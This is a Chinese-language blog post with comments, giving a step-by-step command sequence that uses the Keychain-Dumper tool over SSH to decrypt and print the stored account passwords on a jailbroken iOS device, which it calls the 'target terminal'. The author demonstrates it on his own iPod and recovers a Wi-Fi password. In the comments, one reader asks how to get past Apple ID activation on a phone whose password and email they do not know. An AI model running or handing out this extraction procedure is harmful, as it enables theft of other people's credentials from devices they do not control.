从越狱iOS设备中提取用户帐号与密码

    From:小生@silic security

    在iOS设备中,所有应用程序中需要输入的帐号与密码并不是储存在Applications中,而是储存在/var/Keychains/keychain-2.db中。
    当然,我们可以用一些数据库管理软件打开这个文件,毕竟这是个SQLite文件,但尝试后你会发现这个db中的密码是被加密的,无法直接读取。
    这时,我们便要借助大神们的工具了!
    首先,用ssh连接目标终端,接着输入下列代码:
    apt-get update
    apt-get install ldid git less   #安装所需工具
    git clone git://github.com/ptoomey3/Keychain-Dumper.git   #从github下载解密Keychains的软件包
    cd Keychain-Dumper
    cp keychain_dumper /usr/bin
    keychain_dumper -e >/var/tmp/entitlements.xml   #将目标终端的Keychains数据转储到entitlements.xml
    ldid -S /var/tmp/entitlements.xml keychain_dumper   #为keychain_dumper注册
    keychain_dumper>keychainresults.txt   #开始解密,并将结果输出到keychainresults.txt
    cat keychainresults.txt | less   #通过less显示解密后的结果(空格下翻页,d键上翻页,q键退出)
    IMG_0408.PNG

    我是用自己的iPod Touch 4 (iOS 6.1.2)进行的示范,其中显示出明文密码的是我曾经连接过的一个无线热点。

    IMG_0409.PNG
    但尝试过的同学会发现结果中有部分密文没有被破解,这是因为此软件当初是针对iOS4系统编写的,之后也很久没有更新,再加上软件开发商对用户安全的日益重视,使得破解密码越来越困难,有兴趣的大神可以研究一下这个软件,或许能够想到改善的方法。

    本博客所有文章如无特别注明均为原创。
    复制或转载请以超链接形式注明转自乐橙呀,原文地址《从越狱iOS设备中提取用户帐号与密码
    标签:
    喜欢 | 0
    分享:

已经有4 条评论抢在你前面了~

  1. 沙发
    小雨 2014-02-15

    请问一下 iphone5 7.4 的开机需要激活Apple iD ,密码忘记,邮箱不知,请问如何激活|?

    • 回复
      Noelle 2014-02-15
      @小雨 越狱了吗 没越狱的话 记得密码的话有办法搞定
      • 回复
        小雨 2014-03-4
        @Noelle 没有越狱,密码早忘记了,机子也刷成7.6,还有没有别的方法?
      • 回复
        小雨 2014-03-4
        @Noelle 没有越狱,密码早忘记了,机子也刷成7.6,还有没有别的方法?加我Q:.31690227